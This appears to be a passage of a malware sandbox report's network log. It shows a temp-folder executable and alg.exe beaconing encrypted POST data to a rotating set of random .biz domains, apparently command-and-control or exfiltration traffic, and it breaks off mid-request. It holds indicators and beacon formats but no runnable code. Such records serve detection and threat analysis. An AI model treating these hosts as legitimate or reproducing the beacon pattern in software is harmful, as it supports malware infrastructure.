                                                                                                                                                                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                    111192.168.2.105009713.251.16.150807892C:\Users\user\AppData\Local\Temp\Native_neworigin.exe
                                                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:56.551647902 CET345OUTPOST /met HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                    Host: jdhhbs.biz
                                                                                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                    Content-Length: 834
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:56.551750898 CET834OUTData Raw: 32 51 91 68 cd ce 69 2e 36 03 00 00 9f 37 91 ba 5a 73 1d 23 91 a1 8c 95 a4 3c 0f 11 8d ea d9 5e 2a 46 f3 19 ab f4 ac d1 a8 91 5f ba 9c bc e8 82 83 2b 3e b7 77 2b 5d 06 03 fe 33 f6 dc 64 92 ff cf 27 2e f9 56 95 a1 3d d3 19 bb e5 2a a9 39 80 ac 35
                                                                                                                                                                                                                                                                                                                                                    Data Ascii: 2Qhi.67Zs#<^*F_+>w+]3d'.V=*95~EASY;dyb*:5"w<gw*%/|W'? yos$$vapf&Pt*H[JF8ayHx/?lpva-`To4fX$N x:,>RLA
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:58.699558973 CET408INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                                                                                                                                                    Date: Tue, 26 Nov 2024 07:15:58 GMT
                                                                                                                                                                                                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                                                    Set-Cookie: btst=7bfb1d7709341a3cf2cba78c7f6e6ec5|8.46.123.75|1732605358|1732605358|0|1|0; path=/; domain=.jdhhbs.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                    Set-Cookie: snkz=8.46.123.75; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                    Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                    112192.168.2.105009834.246.200.160806072C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:57.305007935 CET346OUTPOST /t HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                    Host: mgmsclkyu.biz
                                                                                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                    Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:57.305007935 CET778OUTData Raw: 60 a3 a5 33 f9 c6 b5 d3 fe 02 00 00 76 31 90 bb 0a 51 36 04 3c a7 25 6c 6b cc da 6c 2d 82 e5 71 55 0a 4e 07 36 8b e6 c7 01 5a 9c 9b 20 db 51 cc e9 3b b3 12 d5 2f c4 ea f1 3e ce e2 4f 7f af 1f 4f 9b 91 68 c4 65 c4 75 ce e2 c7 a3 a7 1a fa b0 0b 40
                                                                                                                                                                                                                                                                                                                                                    Data Ascii: `3v1Q6<%lkl-qUN6Z Q;/>OOheu@{^q?8T|_2fW;UULw<>u'0b"M,;iej7W:k=9p{&croZx|3W9_?iBi% s@
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:58.776907921 CET411INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                                                                                                                                                    Date: Tue, 26 Nov 2024 07:15:58 GMT
                                                                                                                                                                                                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                                                    Set-Cookie: btst=a73ee14f1aa792a1f58901419fdd76ad|8.46.123.75|1732605358|1732605358|0|1|0; path=/; domain=.mgmsclkyu.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                    Set-Cookie: snkz=8.46.123.75; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                    Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                    113192.168.2.105009934.246.200.160807892C:\Users\user\AppData\Local\Temp\Native_neworigin.exe
                                                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:58.972647905 CET358OUTPOST /qtbrykoecwonf HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                    Host: mgmsclkyu.biz
                                                                                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                    Content-Length: 834
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:58.972702026 CET834OUTData Raw: 6c 06 87 80 d2 1a c0 c3 36 03 00 00 e8 70 0b 2a 36 b1 4a e3 c1 4b 91 19 9f a8 04 c8 40 ef a4 73 46 cb 4a 27 48 74 08 5c d0 4a 7a 02 c7 a7 ca 86 b4 25 a9 1a 80 f2 a8 f7 ab 6a 15 ad 01 3a 17 ce d5 ad 78 3a a8 e7 c6 06 ae 47 c6 5b 55 50 9f 24 c2 8d
                                                                                                                                                                                                                                                                                                                                                    Data Ascii: l6p*6JK@sFJ'Ht\Jz%j:x:G[UP$szv"Q+yYDF`CbH3I>`&e|&M*[TU$~m;h^6Ct%e)(eKtZ9u6JEZh3lzn./1{sCkb
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:16:00.398453951 CET411INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                                                                                                                                                    Date: Tue, 26 Nov 2024 07:16:00 GMT
                                                                                                                                                                                                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                                                    Set-Cookie: btst=4d64c6157d42c4191adb2abb7edd6add|8.46.123.75|1732605360|1732605360|0|1|0; path=/; domain=.mgmsclkyu.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                    Set-Cookie: snkz=8.46.123.75; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                    Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                    114192.168.2.105010018.141.10.107806072C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:59.490206003 CET356OUTPOST /apsbtqhunyqqv HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                    Host: warkcdu.biz
                                                                                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                    Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:59.490281105 CET778OUTData Raw: 61 8d 56 40 20 5a 09 14 fe 02 00 00 d5 5c e1 2c a6 18 a0 f2 85 f2 74 4b 2f a9 0d 0b 87 99 81 67 fc 8f d7 d7 f0 c9 2b ae 0a c8 78 e0 ef be cc bf e3 27 c2 c5 a9 00 1d 66 59 fe c3 0c 6e c0 0b 82 d0 8e 31 37 0d fb ef 53 fe 41 72 74 b8 cd 85 13 8a 9f
                                                                                                                                                                                                                                                                                                                                                    Data Ascii: aV@ Z\,tK/g+x'fYn17SArtEocnn21-XwgN`(=?-cZ#?/B&p>8I/VDV4mZ|h$"\BSMJ_dP9d}}m-h46Y5fMohBv@
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:16:01.563333035 CET409INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                                                                                                                                                    Date: Tue, 26 Nov 2024 07:16:01 GMT
                                                                                                                                                                                                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                                                    Set-Cookie: btst=2df3b391c9483b2b22389ed20c9ad092|8.46.123.75|1732605361|1732605361|0|1|0; path=/; domain=.warkcdu.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                    Set-Cookie: snkz=8.46.123.75; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                    Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                    115192.168.2.105010118.141.10.107807892C:\Users\user\AppData\Local\Temp\Native_neworigin.exe
                                                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:16:00.671976089 CET345OUTPOST /kc HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                    Host: warkcdu.biz
                                                                                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                    Content-Length: 834
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:16:00.672017097 CET834OUTData Raw: c7 ca db 48 4e c9 66 57 36 03 00 00 b3 24 63 c0 13 57 a9 1d 57 7b 2a c2 64 68 10 c9 07 27 58 1f ad a0 8f a0 da e8 4e b2 0c 61 8e b4 33 13 1f e7 47 4c 73 52 0f 8c c5 fc cd 4f 94 7c 14 06 15 bf 1e cf 59 65 36 b5 a1 f4 83 11 36 58 4a f5 5e fc 71 f6
                                                                                                                                                                                                                                                                                                                                                    Data Ascii: HNfW6$cWW{*dh'XNa3GLsRO|Ye66XJ^q!9HHBKb4qL1Ec&UswD]wsdBX6.q.F7hSQl4HLY^>bqac5+%w.}[cuKYI{|fQ;
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:16:02.795696020 CET409INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                                                                                                                                                    Date: Tue, 26 Nov 2024 07:16:02 GMT
                                                                                                                                                                                                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                                                    Set-Cookie: btst=17d27082e3a6d928090ddb2d586cd502|8.46.123.75|1732605362|1732605362|0|1|0; path=/; domain=.warkcdu.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                    Set-Cookie: snkz=8.46.123.75; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                    Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                    116192.168.2.105010213.251.16.150806072C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:16:02.568311930 CET352OUTPOST /pgnqnbmeojw HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                    Host: gcedd.biz
                                                                                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                    Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:16:02.568563938 CET778OUTData Raw: 87 32 6e f4 e2 08 78 6f fe 02 00 00 b9 28 61 bb e0 38 2a da 16 fe 73 a1 3b 21 dc 85 07 f1 95 6b d4 75 80 a3 c1 84 8a 8c a4 ab df 03 fc 0a ec 82 3a d7 cc 39 77 27 2c 80 ea a9 69 09 f7 d4 fd d3 d6 76 03 15 a9 54 b0 45 b1 f0 49 a8 5d f7 fd fe 01 1c
                                                                                                                                                                                                                                                                                                                                                    Data Ascii: 2nxo(a8*s;!ku:9w',ivTEI]nBO4T;om3Q;SGgzz5@&2?I:)Ag:kpTi=}=V!CFD7;m1rg*uS>&/ kEy^
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:16:04.618019104 CET407INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                                                                                                                                                    Date: Tue, 26 Nov 2024 07:16:04 GMT
                                                                                                                                                                                                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                                                    Set-Cookie: btst=fafae6ad68fab49560c8bee96abfa37f|8.46.123.75|1732605364|1732605364|0|1|0; path=/; domain=.gcedd.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                    Set-Cookie: snkz=8.46.123.75; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                    Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                    117192.168.2.105010313.251.16.150807892C:\Users\user\AppData\Local\Temp\Native_neworigin.exe
                                                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:16:03.139421940 CET346OUTPOST /onutm HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                    Host: gcedd.biz
                                                                                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                    Content-Length: 834
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:16:03.139642954 CET834OUTData Raw: 34 0a 1b df 9b 80 f9 c5 36 03 00 00 c5 ee 9e d7 20 a0 27 fd 74 a5 b8 50 a7 9c 6a cd 49 d5 3a 0c fa c3 f7 9d 13 18 0a 28 e9 72 c9 c6 f2 b6 a4 b5 bb a1 cb 5b 91 15 04 ec 54 9b 16 ac 5d b5 ab 5f 6f a8 99 65 3a 65 11 26 a2 3f 06 ac 51 93 f9 7c 19 97
                                                                                                                                                                                                                                                                                                                                                    Data Ascii: 46 'tPjI:(r[T]_oe:e&?Q|SRsgryQ{'sR1T<4(3-lFUW}-gTn'"4\1:#<dT+Y,Nu*LA<;]w!j$<WgmQ_
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:16:05.230103016 CET407INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                                                                                                                                                    Date: Tue, 26 Nov 2024 07:16:04 GMT
                                                                                                                                                                                                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                                                    Set-Cookie: btst=4dea0b61b58ab12172f56e78b83f77fe|8.46.123.75|1732605364|1732605364|0|1|0; path=/; domain=.gcedd.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                    Set-Cookie: snkz=8.46.123.75; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                    Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                    118192.168.2.105010413.251.16.150806072C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:16:05.424184084 CET343OUTPOST /rw HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                    Host: gcedd.biz
                                                                                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                    Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:16:05.424282074 CET778OUTData Raw: 01 1d 32 6a 49 46 f2 b7 fe 02 00 00 09 6a 70 35 70 6e 1b af 89 c4 3b 1e b5 20 a0 51 44 af b3 50 94 4c ad 9a b0 7e 76 02 25 84 3a 33 ae 2e 9a 55 39 bf 7d 18 e6 62 34 a5 94 07 52 20 b6 bb 8f 83 ff cf 3f 29 9d 0b b3 86 c1 fe da 0b c4 d3 fc 7f a0 ad
                                                                                                                                                                                                                                                                                                                                                    Data Ascii: 2jIFjp5pn; QDPL~v%:3.U9}b4R ?)IAos8k ++: ZSU'k;%lz+?3vYw}5#e9Ud$=lATE<fyKjd[m::=LS;Bwv}],
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:16:07.479110956 CET407INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                                                                                                                                                    Date: Tue, 26 Nov 2024 07:16:07 GMT
                                                                                                                                                                                                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                                                    Set-Cookie: btst=c8c6ed460f28f90c2581761c6b48662f|8.46.123.75|1732605367|1732605367|0|1|0; path=/; domain=.gcedd.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                    Set-Cookie: snkz=8.46.123.75; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                    Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                    119192.168.2.105010518.208.156.248807892C:\Users\user\AppData\Local\Temp\Native_neworigin.exe
                                                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:16:06.066241026 CET361OUTPOST /sjpfgfxfdnggnnio HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                    Host: jwkoeoqns.biz
                                                                                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                    Content-Length: 834
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:16:06.066257954 CET834OUTData Raw: 8a 67 06 b4 7e 54 26 e6 36 03 00 00 80 c7 ea 88 7c 3b 8e 0c d7 23 1b d6 e6 6c d2 df 9e 02 f5 db ca f8 59 be 95 13 aa d9 50 9d ce 43 79 a8 6c 7e 66 1c 7e e3 64 b8 ca 0c d4 c5 41 4a 4e 03 2c 0a 01 d7 ba 0b 97 1c 43 cd 3f 70 1c 36 69 c1 2f 84 13 47
                                                                                                                                                                                                                                                                                                                                                    Data Ascii: g~T&6|;#lYPCyl~f~dAJN,C?p6i/Gb'6u#4@soO[$0t@{jur;4%K3bDES`|&U1dpG/*WBo9w2QDwj@w(u4!G'IVg^zmP"E
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:16:07.212944984 CET411INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                                                                                                                                                    Date: Tue, 26 Nov 2024 07:16:07 GMT
                                                                                                                                                                                                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                                                    Set-Cookie: btst=dab12de026976e23d39aa38607568f9d|8.46.123.75|1732605367|1732605367|0|1|0; path=/; domain=.jwkoeoqns.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                    Set-Cookie: snkz=8.46.123.75; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                    Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                    120192.168.2.105010618.246.231.120807892C:\Users\user\AppData\Local\Temp\Native_neworigin.exe
                                                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:16:08.167040110 CET347OUTPOST /rntyad HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                    Host: xccjj.biz
                                                                                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                    Content-Length: 834
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:16:08.167190075 CET834OUTData Raw: 0b 7d 35 11 de 05 d6 c2 36 03 00 00 1a 71 fa d1 fd 3e dd d6 81 d6 74 7e b0 c4 a7 42 75 34 50 39 f7 af 75 30 a5 83 79 c9 12 2f 28 b1 2c 6a 80 14 17 b4 b2 88 70 2b ca 62 6d 95 18 72 db 8c f9 a0 ac 4d 63 55 21 18 87 19 19 d1 e1 30 33 00 f3 85 11 6a
                                                                                                                                                                                                                                                                                                                                                    Data Ascii: }56q>t~Bu4P9u0y/(,jp+bmrMcU!03j>0}-f`Cm|+]B-o+Zl3V^0zSdG(p Cj|r`@~LPnAq'A}.F(|lP\vCL/wc
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:16:09.720235109 CET407INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                                                                                                                                                    Date: Tue, 26 Nov 2024 07:16:09 GMT
                                                                                                                                                                                                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                                                    Set-Cookie: btst=ab22abd1588e0e89cb118d701cf61d46|8.46.123.75|1732605369|1732605369|0|1|0; path=/; domain=.xccjj.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                    Set-Cookie: snkz=8.46.123.75; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                    Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                    121192.168.2.105010718.208.156.248806072C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:16:08.306973934 CET353OUTPOST /vbngsfyw HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                    Host: jwkoeoqns.biz
                                                                                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
